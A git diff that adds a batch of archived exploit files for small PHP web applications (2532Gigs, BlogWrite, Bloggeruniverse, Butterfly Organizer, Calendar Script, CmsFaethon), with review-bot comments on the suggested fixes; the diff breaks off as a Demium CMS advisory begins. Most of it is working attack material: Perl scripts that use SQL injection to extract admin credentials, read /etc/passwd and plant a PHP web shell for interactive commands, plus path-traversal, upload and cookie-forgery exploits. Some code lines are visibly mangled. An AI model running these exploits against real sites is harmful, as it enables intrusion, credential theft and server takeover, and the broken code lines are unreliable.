diff --git a/2532Gigs 1.2.2 Stable - Multiple Vulnerabilities.txt b/2532Gigs 1.2.2 Stable - Multiple Vulnerabilities.txt new file mode 100644 index 0000000..2e995dd --- /dev/null +++ b/2532Gigs 1.2.2 Stable - Multiple Vulnerabilities.txt 
@@ -0,0 +1,96 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : 2532|Gigs v1.2 Stable +Download : http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1 +Dork : Powered by 2532|Gigs v1.2.2 +Vulnerability : Local File Inclusion / Remote File Upload +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +######################################################################################### +[0x02] Bug: [Multiple Local File Inclusions] +###### + +Bugged file is: /[path]/settings.php +Bugged file is: /[path]/deleteuser.php +Bugged file is: /[path]/mini_calendar.php +Bugged file is: /[path]/manage_venues.php +Bugged file is: /[path]/manage_gigs.php + +* There are a lot of other files vulnerable to LFI ! + +[CODE] + + $language + +[!] FIX: Declare $language var. + + +[!] EXPLOIT: /[path]/settings.php?language=[local_file_to_include] +[!] EXPLOIT: /[path]/deleteuser.php?language=[local_file_to_include] +[!] EXPLOIT: /[path]/mini_calendar?language=[local_file_to_include] +[!] EXPLOIT: /[path]/manage_venues.php?language=[local_file_to_include] +[!] EXPLOIT: /[path]/manage_gigs.php?language=[local_file_to_include] + ../../../../../../../../../../etc/passwd%00 + + +######################################################################################### +[0x03] Bug: [Remote File Upload] +###### + +Bugged file is: /[path]/upload_flyer.php + +[CODE] + +if (isset($_POST['submitflyer'])) + { + if (strlen($_FILES['banner']['name']) > 0) +{ +$target = "flyers/".$_FILES['banner']['name']; +move_uploaded_file($_FILES['banner']['tmp_name'], $target); + +// Other code, like it cheeks if /[path]/flyers dir is writable or not ! + +[/CODE] + +As we can see, everyone can upload everything that he wants. 
There is not login required, +and there isn't a cheek for the extension of the file that is going to be uploaded. +So, an unregistered user can upload a file of any extension, like a .php file. Why not +a php shell ? + +[!] FIX: Before the upload script, just cheek if the user is registered, and then allow him + only to upload .gif/jpg or the extension you want, not .php or other extensions ! + + +[!] EXPLOIT: + 1) Go to: /path/upload_flyer.php + 2) Select your local file to upload + 3) Press submit button + 4) Cheek your file at: /[path]/flyers/your_local_file.your_extension + + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-18] + \ No newline at end of file diff --git a/BlogWrite 0.91 - Remote File Disclosure SQL Injection.pl b/BlogWrite 0.91 - Remote File Disclosure SQL Injection.pl new file mode 100644 index 0000000..6faf152 --- /dev/null +++ b/BlogWrite 0.91 - Remote File Disclosure SQL Injection.pl 
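Review bot: The LFI fix under [0x02], "Declare $language var", is not sufficient on its own: the advisory does not show the include line, but if `$language` ends up in an include path after being populated from request data, declaring it changes nothing. The fix should state that the language file name is taken from a fixed allowlist of known language identifiers (or validated against a strict pattern such as two lowercase letters) and never built from `$_GET`/`$_REQUEST` input. For the upload bug under [0x03], an extension check on `$_FILES['banner']['name']` alone is weak because that name is attacker-controlled; the fix should also store the file under a server-generated name in a directory where script execution is disabled (or outside the web root), validate the image content rather than only the extension, and require authentication as the advisory already suggests.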
@@ -0,0 +1,214 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : BlogWrite 0.91 +# |Download : Can't remember 0o +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote FD / SQL Injection Exploit | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/print.php?id=[sql_string] +# |SQL Injections used by this sploit : +# |[1] /path]/print.php?id=-1' union all select 1,2,concat(user,0x3a,pass),4,5,6,0,8 from auth where id='1 +# |[2] /path]/print.php?id=-1' union all select 1,2,load_file('lf'),4,5,6,0,8 from auth where id='1 +# |----------------------------------------------------------------------------------------------------------------------------------| +# |No into dumpfile function, cos query is protected, had not been able to bypass it ! +# |----------------------------------------------------------------------------------------------------------------------------------| + +# -----------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] 
+# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl sql3.txt http://localhost/blogwrite-0.91/ admin_hash +# +# -------------------------------------- +# Blogwrite FD / SQL Inj Exploit +# Coded by Osirys +# ------------------------------------- + +# [*] Extracting admin credentials via Sql Injection .. +# [*] Username: admin +# [*] Password: password +# +# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl sql3.txt http://localhost/blogwrite-0.91/ file_disc +# +# -------------------------------------- +# Blogwrite FD / SQL Inj Exploit +# Coded by Osirys +# ------------------------------------- + +# [*] cat /etc/passwd +# root:x:0:0::/root:/bin/bash +# bin:x:1:1:bin:/bin:/bin/false +# daemon:x:2:2:daemon:/sbin:/bin/false +# adm:x:3:4:adm:/var/log:/bin/false +# lp:x:4:7:lp:/var/spool/lpd:/bin/false +# sync:x:5:0:sync:/sbin:/bin/sync +# shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +# halt:x:7:0:halt:/sbin:/sbin/halt +# mail:x:8:12:mail:/:/bin/false +# news:x:9:13:news:/usr/lib/news:/bin/false +# uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false +# operator:x:11:0:operator:/root:/bin/bash +# games:x:12:100:games:/usr/games:/bin/false +# ftp:x:14:50::/home/ftp:/bin/false +# smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false +# mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false +# rpc:x:32:32:RPC portmap user:/:/bin/false +# sshd:x:33:33:sshd:/:/bin/false +# gdm:x:42:42:GDM:/var/state/gdm:/bin/bash +# apache:x:80:80:User for Apache:/srv/httpd:/bin/false +# messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false +# haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false +# pop:x:90:90:POP:/:/bin/false +# nobody:x:99:99:nobody:/:/bin/false +# osirys:x:1000:100:Giovanni,,,:/home/osirys:/bin/bash +# +# [*] cat exit +# [-] Quitting .. 
+# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| + + +use LWP::UserAgent; +use HTTP::Request::Common; + + +my $host = $ARGV[0]; +my $expl = $ARGV[1]; + +my $sql_inj_path = "/print.php?id="; +my $gen_sql_inj = "-1' union all select 1,2,"; + +($host,$expl) || help("-1"); +cheek($host,$expl) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&adm_hash if $expl_way == 1; +&file_discl if $expl_way == 2; + +sub adm_hash { + print "[*] Extracting admin credentials via Sql Injection ..\n"; + my $attack = $host.$sql_inj_path.$gen_sql_inj."concat(0x64657461696C73,user,0x3a,pass,0x64657461696C73),4,5,6,0,8 from auth where id='1"; + my $re = get_req($attack); + if ($re =~ /details(.+):(.+)details/) { + print "[*] Username: $1\n"; + print "[*] Password: $2\n\n"; + exit(0); + } + else { + print "[-] Can't extract admin credentials\n[-] Exploit Failed !\n\n"; + exit(0); + } +} + +sub file_discl { + print "[*] cat "; + my $file = ; + chomp($file); + $file !~ /exit/ || die "[-] Quitting ..\n"; + if ($file !~ /\/(.*)/) { + print "\n[-] Bad filename !\n"; + &file_discl; + } + my $attack = $host.$sql_inj_path.$gen_sql_inj."load_file('".$file."'),4,5,6,0,8 from auth where id='1"; + my $re = get_req($attack); + my $content = tag($re); + if ($content =~ /<\/b><\/div>

(.+)<\/p>

/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/$out/$out\n/ if ($out !~ /\n$/); + print "$out\n"; + &file_discl; + } + else { + $c++; + print "[-] Can't find ".$file." \n"; + $c < 3 || die "[-] File Disclosure failed !\n[-] Something wrong. Exploit Failed !\n\n"; + &file_discl; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub cheek() { + my $host = $_[0]; + my $expl = $_[1]; + if ($host =~ /http:\/\/(.*)/) { + $ch_host = 1; + } + if ($expl =~ /admin_hash/) { + $ch_expl = 1; + $expl_way = 1; + } + elsif ($expl =~ /file_disc/) { + $ch_expl = 1; + $expl_way = 2; + } + return 1 if ((($ch_host)&&($ch_expl)) == 1); + &help("-2"); +} + +sub banner { + print "\n". + " --------------------------------------\n". + " Blogwrite FD / SQL Inj Exploit \n". + " Coded by Osirys \n". + " ------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input Error, missed some arguments !\n\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad arguments !\n\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_hash\n"; + print " Ex: perl $0 http://site.it/cms/ admin_hash\n"; + print "[*] Usage : perl $0 http://hostname/cms_path file_disc\n"; + print " Ex: perl $0 http://site.it/cms/ file_disc\n"; + exit(0); +} + +# milw0rm.com [2009-02-13] \ No newline at end of file 
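Review bot: The script runs without `use strict; use warnings;`, so the package globals it relies on (`$expl_way`, `$h0st`, `$path`, `$c`, `$link`) are shared silently between subs and the retry counter `$c` in `file_discl` is never reset, which makes the failure paths hard to reason about; the same applies to the Bloggeruniverse and CmsFaethon hunks below. The empty prototypes on `sub get_req()`, `sub cheek()`, `sub tag()` and `sub help()` are not argument checks and would turn into "Too many arguments" compile errors if the subs were ever moved above their call sites, so they should be written as `sub get_req {`. `my $file = ;` inside `file_discl` is not valid Perl; the readline operator was probably lost when the listing was rendered as HTML, as were the closing tags in the `$content` match that now spans several broken lines just before this anchor.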
diff --git a/Bloggeruniverse 2.0 Beta - SQL Injection.pl b/Bloggeruniverse 2.0 Beta - SQL Injection.pl new file mode 100644 index 0000000..8e6b6b6 --- /dev/null +++ b/Bloggeruniverse 2.0 Beta - SQL Injection.pl 
@@ -0,0 +1,249 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Bloggeruniverse v2Beta | +# |Download : http://garr.dl.sourceforge.net/sourceforge/bloggeruniverse/bloggeruniverse-beta2.zip | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Exploit (Admin credentials extract + File Disclosure + Remote Command Execution via Sql Injection) | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/editcomments.php?id=[sql_string] +# | There are other sql injections, find them by yourself ;) +# |[!] This Blog system doesn't cheek if install.php file still exists after installation ! ;) +# |SQL Injections used by this sploit : +# |[1] /path]/editcomments.php?id=-2 union all select 1,2,3,4,5,6,concat(username,0x3a,password),8 from users +# |[2] /path]/editcomments.php?id=-2 union all select 1,2,3,4,5,6,load_file('lf'),8 +# |[3] /path]/editcomments.php?id=-2 union all select 1,2,3,4,5,6,'content',8 into dumpfile 'path' +# |----------------------------------------------------------------------------------------------------------------------------------| +# |This CMS is vulnerable to sql injection. 
This simple exploit just uses the sql bug to get admin credentials (username,password), +# |uses load_file() mysql function to disclosure local file on the server, uses the '' into dumpfile '' mysql function to save a +# |php shell on the website, so it will allows you to execute commands. +# |The RCE way is more difficult, becouse you need to know the site's path on the server, dumpfile function needs it ! +# |I'm trying to find an universal way to find the cwd of the site in the server from sql injection, still nothing. Would be good a +# |LFI bug, so then we could write our file into /tmp, and then include it via LFI. +# |----------------------------------------------------------------------------------------------------------------------------------| + +# Pastin' here output of all exploiting way of this sploit will be too long, here the first way : Admin credentials extract +# -----------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl p0w.txt http://localhost/bloggeruniverse-beta2/ admin_hash +# +# -------------------------------------- +# Bloggeruniverse Remote Exploit +# Coded by Osirys +# ------------------------------------- +# +# [*] Extracting admin credentials via Sql Injection .. 
+# [*] Username: admin +# [*] Password: 5f4dcc3b5aa765d61d8327deb882cf99 +# +# osirys[~]> +# -----------------------------------------------------------------------------------------------------------------------------------| + +use LWP::UserAgent; +use HTTP::Request::Common; + +my $host = $ARGV[0]; +my $expl = $ARGV[1]; +my $fpath = $ARGV[2]; + +my $sql_inj_path = "/editcomments.php?id="; +my $gen_sql_inj = "-2 union all select 1,2,3,4,5,6,"; +my $php_c0de = ""; + +$fpath = "/x" if ($expl =~ /file_disc/); +$fpath = "/x" if ($expl =~ /admin_hash/); +($host,$expl,$fpath) || help("-1"); +cheek($host,$expl,$fpath) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&adm_hash if $expl_way == 1; +&file_discl if $expl_way == 2; +&cmd if $expl_way == 3; + +sub adm_hash { + print "[*] Extracting admin credentials via Sql Injection ..\n"; + my $sql_inj = $sql_inj_path.$gen_sql_inj."concat(username,0x3a,password),8 from users"; + my $attack = $host.$sql_inj; + my $re = get_req($attack); + my $content = tag($re); + if ($content =~ /name="comment">([a-zA-Z0-9-_.]{2,15}):([a-f0-9]{32})<\/textarea>/) { + print "[*] Username: $1\n"; + print "[*] Password: $2\n\n"; + exit(0); + } + else { + print "[-] Can't extract admin credentials\n[-] Exploit Failed !\n\n"; + exit(0); + } +} + +sub file_discl { + print "[*] cat "; + my $file = ; + chomp($file); + $file !~ /exit/ || die "[-] Quitting ..\n"; + if ($file !~ /\/(.*)/) { + print "\n[-] Bad filename !\n"; + &file_discl; + } + my $sql_inj = $sql_inj_path.$gen_sql_inj."load_file(\"".$file."\"),8"; + my $attack = $host.$sql_inj; + my $re = get_req($attack); + my $content = tag($re); + if ($content =~ /name="comment">(.+)<\/textarea>\*\*\*\*\*\*<\/td>/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/$out/$out\n/ if ($out !~ /\n$/); + print "$out\n"; + &file_discl; + } + elsif ($content =~ /name="comment"><\/textarea>\*\*\*\*\*\*<\/td>/) { + $c++; + print 
"[-] Can't find ".$file." \n"; + $c < 3 || die "[-] File Disclosure failed !\n[-] Something wrong. Exploit Failed !\n\n"; + &file_discl; + } +} + +sub cmd { + print "[*] Injectin php shell via Sql Injection\n"; + my $sql_inj = $sql_inj_path.$gen_sql_inj."'".$php_c0de."',8 into dumpfile '".$fpath."/shell.php'"; + my $attack = $host.$sql_inj; + get_req($attack); + my $test = get_req($host."shell.php"); + if ($test =~ /st4rt/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + &exec_cmd; + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd() { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + my $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + my $exec_url = $exec_path."?cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /st4rt(.+)8/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/8//g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." 
".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub cheek() { + my $host = $_[0]; + my $expl = $_[1]; + my $fpath = $_[2]; + if ($host =~ /http:\/\/(.*)/) { + $ch_host = 1; + } + if ($expl =~ /admin_hash/) { + $ch_expl = 1; + $ch_fpath = 1; + $expl_way = 1; + } + elsif ($expl =~ /file_disc/) { + $ch_expl = 1; + $ch_fpath = 1; + $expl_way = 2; + } + elsif ($expl =~ /cmd/) { + $ch_expl = 1; + $expl_way = 3; + } + if ($fpath =~ /\/(.*)/) { + $ch_fpath = 1; + } + return 1 if ((($ch_host)&&($ch_expl)&&($ch_fpath)) == 1); + &help("-2"); +} + +sub banner { + print "\n". + " --------------------------------------\n". + " Bloggeruniverse Remote Exploit \n". + " Coded by Osirys \n". + " ------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input Error, missed some arguments !\n\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad arguments !\n\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_hash\n"; + print " Ex: perl $0 http://site.it/cms/ admin_hash\n"; + print "[*] Usage : perl $0 http://hostname/cms_path file_disc\n"; + print " Ex: perl $0 http://site.it/cms/ file_disc\n"; + print "[*] Usage : perl $0 http://hostname/cms_path cmd path_of_site\n"; + print " Ex: perl $0 http://site.it/cms/ cmd /home/osirys/web/cms/\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/Butterfly ORGanizer 2.0.1 SQL Injection.txt b/Butterfly ORGanizer 2.0.1 SQL Injection.txt new file mode 100644 index 0000000..5e01900 --- /dev/null +++ b/Butterfly ORGanizer 2.0.1 SQL Injection.txt 
@@ -0,0 +1,35 @@ +######################################################################################### +[0x01] Informations: + +Name : Butterfly Organizer 2.0.1 Sql Injection +Download : http://www.hotscripts.com/jump.php?listing_id=72677&jump_type=1 +Vulnerability : Remote Sql Injection +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +* : Same bug of the previous version: http://milw0rm.com/exploits/5797 + +######################################################################################### +[0x02] Bug: + +Bugged file is /[path]/view.php + +[CODE] +$mytable = $_GET['mytable']; +$id = $_GET['id']; + +$result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database); +$myrow = mysql_fetch_array($result); +[/CODE] + +Query accept direct GET input, so we can inject hell sql code. +To avoid this vulnerability, just escape GET input. + +######################################################################################### +[0x03] Exploit: + +http://localhost/[path]/view.php?id=-1+union+select+0x49276d2076756c6e657261626c65203a28,2,3,name,url,username,password,8,9,10+from+test_category&mytable=test_category + +######################################################################################## + +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/Calendar Script 1.1 - Insecure Cookie Handling.txt b/Calendar Script 1.1 - Insecure Cookie Handling.txt new file mode 100644 index 0000000..f4bc8c7 --- /dev/null +++ b/Calendar Script 1.1 - Insecure Cookie Handling.txt 
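Review bot: The remediation sentence "To avoid this vulnerability, just escape GET input" is incomplete for the snippet under [0x02]: `$mytable` is interpolated as a table identifier, and string escaping (mysql_real_escape_string or magic quotes) does not protect an identifier position, so `mytable` must be matched against a fixed allowlist of table names before it is used. `$id` is interpolated unquoted, so escaping does not help there either; it should be cast with `(int)` or bound as a parameter in a prepared statement. A short note that `SELECT *` on an attacker-chosen table also exposes every other table the database user can read would make the impact section clearer.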
@@ -0,0 +1,53 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : Calendar Script v1.1 +Download : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1 +Vulnerability : Insecure Cookie Handling +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +######################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/index.php + +[CODE] + +if(mysql_num_rows($checkDetails) > 0) { + setcookie('nodstrumCalendarV2', '1', time()+3600); // Cookie will expire in 1 hour. + // $loginMsg = 'You are logged in!'; +} + +[/CODE] + +If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and +'1' as content. + +## [!] FIX: Change name or content to the cookie. Example: + +[CODE] + +if(mysql_num_rows($checkDetails) > 0) { + setcookie('nodstrumCalendarV2', '$password', time()+3600); // Cookie will expire in 1 hour. + // $loginMsg = 'You are logged in!'; +} + +[/CODE] + + +### [!] EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/"; + + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-18] \ No newline at end of file diff --git a/CmsFaethon 2.2.0 - SQL Injection.pl b/CmsFaethon 2.2.0 - SQL Injection.pl new file mode 100644 index 0000000..e46a4c0 --- /dev/null +++ b/CmsFaethon 2.2.0 - SQL Injection.pl 
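Review bot: The suggested fix `setcookie('nodstrumCalendarV2', '$password', time()+3600);` does not do what the text implies: in PHP single quotes `'$password'` is the literal string `$password`, not the variable, so the cookie would still be a fixed, guessable value. Even with interpolation, placing the password (or a hash of it) in a client-side cookie only moves the secret to the browser and remains forgeable by anyone who obtains it; the appropriate fix is a server-side session (`session_start()` with a server-held login flag) or a random, server-stored token compared on every request. The advice to "change name" of the cookie should be dropped, since the name is visible to the client and adds no protection.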
@@ -0,0 +1,238 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : CmsFaethon 2.2.0 Ultimate | +# |Download : http://garr.dl.sourceforge.net/sourceforge/cmsfaethon/cmsfaethon-2.2.0-ultimate.zip | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote SQL Command Injection Exploit | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/info.php?item=[sql_string] +# |SQL Injections used by this sploit : +# |[1] /path]/info.php?item=-2' union all select concat(username,0x3a,password),0 from f06_users order by '* +# |[2] /path]/info.php?item=-2' union all select load_file('lf'),0 order by '* +# |[3] /path]/info.php?item=-2' union all select 'content',0 into dumpfile 'file +# |----------------------------------------------------------------------------------------------------------------------------------| +# |This exploit just use a trick that came in my mind smocking a cigarette. It's just a SQL Injection vulnerability, but with this +# |trick can become a RCE vulnerability. A lot of people already know the into dumpfile mysql function, but this function needs the +# |path of the site in the server, so the attacker has to find this path to perform a RCE attack. +# |I just found a possible way to find this path. Making a HTTP GET request to a non existent file of the cms, this wrong request will +# |appear into error log files. 
So, just using then load_file() function on each possible path of error logs, when we will find the +# |right path, will appear error log's content, so we will be able to get the website path in the server just watching near the error +# |that came out after the request to a non existent file. Anyway, soon I will write a paper to talk about this trick. +# |It's just an experimental way to RCE by SQL. Can be emproved. A complete paper will arrive soon ! +# |Coz to use this technique you need to know few things before :P +# |----------------------------------------------------------------------------------------------------------------------------------| + +# -----------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl p0w.txt http://localhost/cmsfaethon-2.0.4-ultimate/20_ultimate/ +# +# --------------------------------- +# CmsFaethon Remote SQL +# CMD Inj Sploit +# by Osirys +# --------------------------------- +# +# [*] Getting admin login details .. +# [$] User: admin +# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99 +# [*] Generating error through GET request .. +# [*] Cheeking Apache Error Log path .. +# [*] Error Log path found -> /var/log/httpd/error_log +# [*] Website path found -> /home/osirys/web/cmsfaethon-2.0.4-ultimate/20_ultimate/ +# [*] Shell succesfully injected ! +# [&] Hi my master, do your job now [!] + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/cmsfaethon-2.0.4-ultimate/20_ultimate +# shell[localhost]$> exit +# [-] Quitting .. 
+# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| + + +use IO::Socket; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $rand = int(rand 9) +1; + +my @error_logs = qw( + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/apache/error.log + /var/log/apache/error_log + /var/log/apache2/error.log + /var/log/apache2/error_log + /logs/error.log + /var/log/apache/error_log + /var/log/apache/error.log + /usr/local/apache/logs/error_log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + ); + +my $php_c0de = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Getting admin login details ..\n"; + +my $url = $host."/info.php?item=-2' union all select concat(0x64657461696C73,username,0x3a,password,0x64657461696C73),0 from f06_users order by '*"; +my $re = get_req($url); +if ($re =~ /details(.+):(.+)details/) { + $user = $1; + $pass = $2; + print "[\$] User: $user\n"; + print "[\$] Pass: $pass\n"; +} +else { + print "[-] Can't extract admin details\n\n"; +} + +print "[*] Generating error through GET request ..\n"; + +get_req($host."/osirys_log_test".$rand); + +print "[*] Cheeking Apache Error Log path ..\n"; + +while (($log = <@error_logs>)&&($gotcha != 1)) { + $tmp_path = $host."/info.php?item=-2' union all select load_file('".$log."'),0 order by '*"; + $re = get_req($tmp_path); + if ($re =~ /File does not exist: (.+)\/osirys_log_test$rand/) { + $site_path = $1."/"; + $gotcha = 1; + print "[*] Error Log path found -> $log\n"; + print "[*] Website path found -> $site_path\n"; + &inj_shell; + } +} + +$gotcha == 1 || die "[-] Couldn't file error_log !\n"; + +sub inj_shell { + my $attack = $host."/info.php?item=-2' 
union all select '".$php_c0de."',0 into dumpfile '".$site_path."/1337.php"; + get_req($attack); + my $test = get_req($host."/1337.php"); + if ($test =~ /st4rt/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + &exec_cmd; + + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host."/1337.php?cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /st4rt(.+)0/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " CmsFaethon Remote SQL \n". + " CMD Inj Sploit \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! 
\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-13] diff --git a/Demium CMS 0.2.1b - Multiple Vulnerabilities.txt b/Demium CMS 0.2.1b - Multiple Vulnerabilities.txt new file mode 100644 index 0000000..2acec98 --- /dev/null +++ b/Demium CMS 0.2.1b - Multiple Vulnerabilities.txt 
@@ -0,0 +1,450 @@
+Demium CMS, version 0.2.1 Beta, is prone to multiple remote vulnerabilities, because of insufficient security on it. Let's see them. In this advisory
+you can find vulnerabilities, afflicted source, and multiple Remote Exploit.
+
+
+Credits to : Giovanni Buzzin, Osirys
+Contact : osirys[at]autistici[dot]org
+Website : http://osirys.org
+Download : http://www.demium.de/ftp/archive/demium_beta_v.0.2.1.rar
+
+
+[0x01 - Authority Bypass via Sql Injection]
+
+ At first, it's vulnerable to Authority Bypass via Sql Injection. Needs Magic Quotes OFF to work, because CMS dosn't stripslash on
+ POST data.
+
+ Vulnerable file is: /[path]/index_admin.php
+ [CODE]
+ $username = $_POST['user'];
+ $pw = md5($_POST['pw']);
